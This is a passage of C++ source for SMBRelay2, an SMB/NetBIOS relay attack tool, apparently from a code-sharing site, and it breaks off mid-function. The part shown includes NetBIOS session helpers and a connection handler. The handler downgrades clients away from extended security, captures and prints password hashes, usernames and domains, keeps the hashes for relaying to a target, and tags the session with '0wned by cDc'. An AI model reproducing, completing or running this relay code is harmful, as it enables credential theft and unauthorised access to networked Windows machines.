📄 smbrelay2.cpp
字号:
{
case SMB_COM_CREATE_DIRECTORY:
ret = "SMB_COM_CREATE_DIRECTORY";
break;
case SMB_COM_DELETE_DIRECTORY:
ret = "SMB_COM_DELETE_DIRECTORY";
break;
case SMB_COM_OPEN:
ret = "SMB_COM_OPEN";
break;
case SMB_COM_CREATE:
ret = "SMB_COM_CREATE";
break;
case SMB_COM_CLOSE:
ret = "SMB_COM_CLOSE";
break;
case SMB_COM_FLUSH:
ret = "SMB_COM_FLUSH";
break;
case SMB_COM_DELETE:
ret = "SMB_COM_DELETE";
break;
case SMB_COM_RENAME:
ret = "SMB_COM_RENAME";
break;
case SMB_COM_QUERY_INFORMATION:
ret = "SMB_COM_QUERY_INFORMATION";
break;
case SMB_COM_SET_INFORMATION:
ret = "SMB_COM_SET_INFORMATION";
break;
case SMB_COM_READ:
ret = "SMB_COM_READ";
break;
case SMB_COM_WRITE:
ret = "SMB_COM_WRITE";
break;
case SMB_COM_LOCK_BYTE_RANGE:
ret = "SMB_COM_LOCK_BYTE_RANGE";
break;
case SMB_COM_UNLOCK_BYTE_RANGE:
ret = "SMB_COM_UNLOCK_BYTE_RANGE";
break;
case SMB_COM_CREATE_TEMPORARY:
ret = "SMB_COM_CREATE_TEMPORARY";
break;
case SMB_COM_CREATE_NEW:
ret = "SMB_COM_CREATE_NEW";
break;
case SMB_COM_CHECK_DIRECTORY:
ret = "SMB_COM_CHECK_DIRECTORY";
break;
case SMB_COM_PROCESS_EXIT:
ret = "SMB_COM_PROCESS_EXIT";
break;
case SMB_COM_SEEK:
ret = "SMB_COM_SEEK";
break;
case SMB_COM_LOCK_AND_READ:
ret = "SMB_COM_LOCK_AND_READ";
break;
case SMB_COM_WRITE_AND_UNLOCK:
ret = "SMB_COM_WRITE_AND_UNLOCK";
break;
case SMB_COM_READ_RAW:
ret = "SMB_COM_READ_RAW";
break;
case SMB_COM_READ_MPX:
ret = "SMB_COM_READ_MPX";
break;
case SMB_COM_READ_MPX_SECONDARY:
ret = "SMB_COM_READ_MPX_SECONDARY";
break;
case SMB_COM_WRITE_RAW:
ret = "SMB_COM_WRITE_RAW";
break;
case SMB_COM_WRITE_MPX:
ret = "SMB_COM_WRITE_MPX";
break;
case SMB_COM_WRITE_COMPLETE:
ret = "SMB_COM_WRITE_COMPLETE";
break;
case SMB_COM_SET_INFORMATION2:
ret = "SMB_COM_SET_INFORMATION2";
break;
case SMB_COM_QUERY_INFORMATION2:
ret = "SMB_COM_QUERY_INFORMATION2";
break;
case SMB_COM_LOCKING_ANDX:
ret = "SMB_COM_LOCKING_ANDX";
break;
case SMB_COM_TRANSACTION:
ret = "SMB_COM_TRANSACTION";
break;
case SMB_COM_TRANSACTION_SECONDARY:
ret = "SMB_COM_TRANSACTION_SECONDARY";
break;
case SMB_COM_IOCTL:
ret = "SMB_COM_IOCTL";
break;
case SMB_COM_IOCTL_SECONDARY:
ret = "SMB_COM_IOCTL_SECONDARY";
break;
case SMB_COM_COPY:
ret = "SMB_COM_COPY";
break;
case SMB_COM_MOVE:
ret = "SMB_COM_MOVE";
break;
case SMB_COM_ECHO:
ret = "SMB_COM_ECHO";
break;
case SMB_COM_WRITE_AND_CLOSE:
ret = "SMB_COM_WRITE_AND_CLOSE";
break;
case SMB_COM_OPEN_ANDX:
ret = "SMB_COM_OPEN_ANDX";
break;
case SMB_COM_READ_ANDX:
ret = "SMB_COM_READ_ANDX";
break;
case SMB_COM_WRITE_ANDX:
ret = "SMB_COM_WRITE_ANDX";
break;
case SMB_COM_CLOSE_AND_TREE_DISC:
ret = "SMB_COM_CLOSE_AND_TREE_DISC";
break;
case SMB_COM_TRANSACTION2:
ret = "SMB_COM_TRANSACTION2";
break;
case SMB_COM_TRANSACTION2_SECONDARY:
ret = "SMB_COM_TRANSACTION2_SECONDARY";
break;
case SMB_COM_FIND_CLOSE2:
ret = "SMB_COM_FIND_CLOSE2";
break;
case SMB_COM_FIND_NOTIFY_CLOSE:
ret = "SMB_COM_FIND_NOTIFY_CLOSE";
break;
case SMB_COM_TREE_CONNECT:
ret = "SMB_COM_TREE_CONNECT";
break;
case SMB_COM_TREE_DISCONNECT:
ret = "SMB_COM_TREE_DISCONNECT";
break;
case SMB_COM_NEGOTIATE:
ret = "SMB_COM_NEGOTIATE";
break;
case SMB_COM_SESSION_SETUP_ANDX:
ret = "SMB_COM_SESSION_SETUP_ANDX";
break;
case SMB_COM_LOGOFF_ANDX:
ret = "SMB_COM_LOGOFF_ANDX";
break;
case SMB_COM_TREE_CONNECT_ANDX:
ret = "SMB_COM_TREE_CONNECT_ANDX";
break;
case SMB_COM_QUERY_INFORMATION_DISK:
ret = "SMB_COM_QUERY_INFORMATION_DISK";
break;
case SMB_COM_SEARCH:
ret = "SMB_COM_SEARCH";
break;
case SMB_COM_FIND:
ret = "SMB_COM_FIND";
break;
case SMB_COM_FIND_UNIQUE:
ret = "SMB_COM_FIND_UNIQUE";
break;
case SMB_COM_NT_TRANSACT:
ret = "SMB_COM_NT_TRANSACT";
break;
case SMB_COM_NT_TRANSACT_SECONDARY:
ret = "SMB_COM_NT_TRANSACT_SECONDARY";
break;
case SMB_COM_NT_CREATE_ANDX:
ret = "SMB_COM_NT_CREATE_ANDX";
break;
case SMB_COM_NT_CANCEL:
ret = "SMB_COM_NT_CANCEL";
break;
case SMB_COM_OPEN_PRINT_FILE:
ret = "SMB_COM_OPEN_PRINT_FILE";
break;
case SMB_COM_WRITE_PRINT_FILE:
ret = "SMB_COM_WRITE_PRINT_FILE";
break;
case SMB_COM_CLOSE_PRINT_FILE:
ret = "SMB_COM_CLOSE_PRINT_FILE";
break;
case SMB_COM_GET_PRINT_QUEUE:
ret = "SMB_COM_GET_PRINT_QUEUE";
break;
default:
sprintf(retbuff, "Command 0x%02X", Command);
break;
}
return ret;
}
BOOL NBAddName (char *LocalName, NCB *pncb = NULL)
{
NCB ncb;
if (pncb == NULL)
pncb = &ncb;
memset (pncb, 0, sizeof (NCB));
if (g_LocalGroupName)
pncb->ncb_command = NCBADDGRNAME;
else
pncb->ncb_command = NCBADDNAME;
pncb->ncb_lana_num = g_LanaNum;
memcpy(pncb->ncb_name, LocalName, NCBNAMSZ);
fprintf(stderr, "Registering NetBIOS name: ");
PrintNetBIOSName((unsigned char *)LocalName);
fprintf(stderr, "...\n");
Netbios (pncb);
NBCheck ((*pncb), "NBAddName");
return (NRC_GOODRET == pncb->ncb_retcode);
}
BOOL NBCall(PNCB pncb, char *RemoteName)
{
fprintf(stderr, "Calling name: ");
PrintNetBIOSName((unsigned char *)RemoteName);
fprintf(stderr, "...\n");
pncb->ncb_command = NCBCALL;
memcpy(pncb->ncb_callname, RemoteName, NCBNAMSZ);
pncb->ncb_rto = 1;
Netbios (pncb);
if (NRC_GOODRET != pncb->ncb_retcode)
return FALSE;
return TRUE;
}
BOOL NBListen(PNCB pncb, char *RemoteName = WILDCARDNAME)
{
fprintf(stderr, "Listening for connections from name: ");
PrintNetBIOSName((unsigned char *)RemoteName);
fprintf(stderr, "...\n");
pncb->ncb_command = NCBLISTEN;
memcpy(pncb->ncb_callname, RemoteName, NCBNAMSZ);
pncb->ncb_rto = 1;
Netbios (pncb);
if (NRC_GOODRET != pncb->ncb_retcode)
return FALSE;
fprintf(stderr, "Connection received from name: ");
PrintNetBIOSName(pncb->ncb_callname);
fprintf(stderr, "\n");
return TRUE;
}
BOOL NBSend(PNCB pncb, char *buff, WORD len)
{
pncb->ncb_command = NCBSEND;
pncb->ncb_buffer = (unsigned char *)buff;
pncb->ncb_length = len;
Netbios (pncb);
NBCheck((*pncb), "NBSend");
return (NRC_GOODRET == pncb->ncb_retcode);
}
BOOL NBRecv(PNCB pncb, unsigned char *buff, WORD len)
{
pncb->ncb_command = NCBRECV;
pncb->ncb_buffer = buff;
pncb->ncb_length = len;
Netbios (pncb);
if ( pncb->ncb_retcode == NRC_CMDTMO )
pncb->ncb_length = 0;
else
NBCheck((*pncb), "NBRecv");
return (NRC_GOODRET == pncb->ncb_retcode || NRC_CMDTMO == pncb->ncb_retcode );
}
BOOL NBReset (int nLana, int nSessions, int nNames)
{
NCB ncb;
memset (&ncb, 0, sizeof (ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lsn = 0; // Allocate new lana_num resources
ncb.ncb_lana_num = nLana;
ncb.ncb_callname[0] = nSessions; // maximum sessions
ncb.ncb_callname[2] = nNames; // maximum names
Netbios (&ncb);
NBCheck (ncb, "NBReset");
return (NRC_GOODRET == ncb.ncb_retcode);
}
BOOL NBHangup ( PNCB pncb)
{
pncb->ncb_command = NCBHANGUP;
Netbios (pncb);
NBCheck ((*pncb), "NBHangup");
return (NRC_GOODRET == pncb->ncb_retcode);
}
void Usage()
{
puts("SMBRelay2 [Options]");
puts(" Options:");
puts(" /A LanaNum - Use LanaNum");
puts(" Defaults to 0");
puts(" /D DebugLevel - Level of debug messages, valid levels 0 - 3");
puts(" Defaults to 0");
puts(" /L LocalName - Listen for primary connection on LocalName");
puts(" Defaults to SERVER");
puts(" /R RelayName - Listen for relay connection on RelayName");
puts(" Defaults to RELAY");
puts(" /S SourceName - Use SourceName when connecting to target");
puts(" Defaults to CDC4EVER");
puts(" /T TargetName - Connect to TargetName for relay");
puts(" Defaults to connecting back to client");
puts(" /? /H - This help");
}
char TargetName[32] = NULLNAME;
char SourceName[32] = "CDC4EVER \0";
char RelayName[32] = "RELAY ";
BOOL RegisterSourceName = TRUE;
void ConnectionHandlerThread(void *arg)
{
char buff[65535];
char NameBuff[NCBNAMSZ];
BYTE challenge[8];
BYTE caseinsensitivepassword[24];
BYTE casesensitivepassword[24];
char username[64];
char hostname[64];
DWORD SessionID;
char negotiateheaders[1024];
char logonandconnectheaders[1024];
WORD UID;
NCB inncb, outncb;
int x;
memcpy(&inncb, arg, sizeof(NCB));
if (memcmp(TargetName, NULLNAME, NCBNAMSZ) == 0)
memcpy(NameBuff, inncb.ncb_callname, NCBNAMSZ);
else
memcpy(NameBuff, TargetName, NCBNAMSZ);
NameBuff[NCBNAMSZ-1] = 0x20;
memcpy(hostname, NameBuff, NCBNAMSZ-1);
char *ptr = hostname + NCBNAMSZ-1;
do
{
*ptr = 0;
ptr--;
} while (*ptr == ' ');
if (RegisterSourceName )
{
RegisterSourceName = FALSE;
if (!NBAddName(SourceName, &outncb))
{
NBHangup(&inncb);
return;
}
}
if (!NBCall(&outncb, NameBuff))
{
NBHangup(&inncb);
return ;
}
PSMBHEADER psmbheader = (PSMBHEADER)(buff);
PSMBDIALECTSELECTHEADER pdialectselectheader = (PSMBDIALECTSELECTHEADER)(psmbheader+1);
PSESSION_SETUP_ANDHEADER psessionsetupand = (PSESSION_SETUP_ANDHEADER)(psmbheader+1);
PSESSION_SETUP_ANDHEADER2 psessionsetupand2 = (PSESSION_SETUP_ANDHEADER2)(psmbheader+1);
PSESSION_SETUP_ANDHEADER2EX psessionsetupand2ex = ( PSESSION_SETUP_ANDHEADER2EX)(psmbheader+1);
PSESSION_SETUP_ANDRESPONSEHEADER psessionsetupandresponse = (PSESSION_SETUP_ANDRESPONSEHEADER)(psmbheader + 1);
PTREE_CONNECT_ANDHEADER ptreeconnectand = (PTREE_CONNECT_ANDHEADER)(psmbheader+1);
BOOL bConnected = FALSE;
BOOL bContinue = TRUE;
x = 0;
while (bContinue && !bConnected && !g_bQuit)
{
if (g_DebugLevel > 2)
fprintf(stderr, "Receiving input block\n");
if (!NBRecv(&inncb, (PUCHAR)buff, sizeof(buff)))
{
NBHangup(&outncb);
return;
}
if (psmbheader->MagicVal == SMBMAGICVAL)
{
fprintf(stderr, "%s\n", GetCommandType(psmbheader->Command) );
// Downgrade security to NTLM
psmbheader->bExtendedSecurity = FALSE;
psmbheader->bNTErrorCodes = FALSE;
// psmbheader->bUnicodeStrings = FALSE;
psmbheader->bFlags2IsLongName = FALSE;
switch (psmbheader->Command)
{
case SMB_COM_NEGOTIATE:
// set to NT style connection (no extended security)
psmbheader->bUnicodeStrings = FALSE;
psmbheader->bNTErrorCodes = FALSE;
psmbheader->bUnknown1 = FALSE;
psmbheader->bUnknown2 = FALSE;
psmbheader->bUnknown3 = FALSE;
psmbheader->bUnknown4 = FALSE;
psmbheader->bUnknown5 = FALSE;
psmbheader->bUnknown6 = FALSE;
psmbheader->bUnknown7 = FALSE;
psmbheader->bUnknown8 = FALSE;
psmbheader->bExtendedSecurity = FALSE;
break;
case SMB_COM_SESSION_SETUP_ANDX:
switch (psessionsetupand->Len)
{
case SESSION_SETUP_ANDHEADER_LEN: // 9x?
fprintf(stderr, "Password length: %d\n", psessionsetupand->PasswordLen );
if (psessionsetupand->PasswordLen > 1)
{
fprintf(stderr, "Password: ");
PrintHexString((BYTE *)(psessionsetupand + 1), psessionsetupand->PasswordLen );
fprintf(stderr, "\n");
bContinue = FALSE;
// bConnected = FALSE;
}
break;
case SESSION_SETUP_ANDHEADER2_LEN: // NT 4
fprintf(stderr, "Password lengths: %d %d\n", psessionsetupand2->CaseInsensitivePasswordLen, psessionsetupand2->CaseSensitivePasswordLen );
if (psessionsetupand2->CaseInsensitivePasswordLen > 1)
{
fprintf(stderr, "Case insensitive password: ");
PrintHexString((BYTE *)(psessionsetupand2 + 1), psessionsetupand2->CaseInsensitivePasswordLen );
fprintf(stderr, "\n");
memcpy(caseinsensitivepassword, psessionsetupand2 + 1, 24);
}
if (psessionsetupand2->CaseSensitivePasswordLen > 1)
{
fprintf(stderr, "Case sensitive password: ");
PrintHexString((BYTE *)(psessionsetupand2 + 1) + psessionsetupand2->CaseInsensitivePasswordLen, psessionsetupand2->CaseSensitivePasswordLen );
fprintf(stderr, "\n");
memcpy(casesensitivepassword, (BYTE *)(psessionsetupand2 + 1) + psessionsetupand2->CaseInsensitivePasswordLen, 24);
}
if (/* psmbheader->bUnicodeStrings */TRUE)
{
WCHAR *ptr = (WCHAR *)(psessionsetupand2 + 1);
ptr = (WCHAR *)((char *)ptr + psessionsetupand2->CaseInsensitivePasswordLen + psessionsetupand2->CaseSensitivePasswordLen + 1);
fprintf(stderr, "Username: \"%S\"\n", ptr);
sprintf(username, "%S", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "Domain: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "OS: \"%S\"\n", ptr);
#if 1
_snwprintf(ptr, wcslen(ptr) , L"0wned by cDc ");
#endif
ptr += wcslen(ptr) + 1;
fprintf(stderr, "Lanman type: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
fprintf(stderr, "???: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
}
else
{
char *ptr = (char *)(psessionsetupand2 + 1);
ptr += psessionsetupand2->CaseInsensitivePasswordLen + psessionsetupand2->CaseSensitivePasswordLen + 1;
fprintf(stderr, "Username: \"%s\"\n", ptr);
strncpy(username, ptr, sizeof(username));
ptr += strlen(ptr) + 1;
fprintf(stderr, "Domain: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
fprintf(stderr, "OS: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
fprintf(stderr, "Lanman type: \"%s\"\n", ptr);
}
if (psessionsetupand2->AndXCommand == SMB_COM_TREE_CONNECT_ANDX)
{
// add TREE_CONNECT_AND portion to connect to IPC$
psessionsetupand2->AndXOffset = sizeof(SMBHEADER) + psessionsetupand2->Len * 2 + psessionsetupand2->ByteCount + 3;
PTREE_CONNECT_ANDHEADER pTreeConnectAnd2 = (PTREE_CONNECT_ANDHEADER)(PTREE_CONNECT_ANDRESPONSEHEADER)( (char *)psmbheader + psessionsetupand2->AndXOffset );
pTreeConnectAnd2->Len = TREE_CONNECT_ANDHEADER_LEN;
pTreeConnectAnd2->AndXCommand = SMB_NONE;
pTreeConnectAnd2->AndXOffset = 0;
pTreeConnectAnd2->AndXReserved = 0;
pTreeConnectAnd2->Flags = 0;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -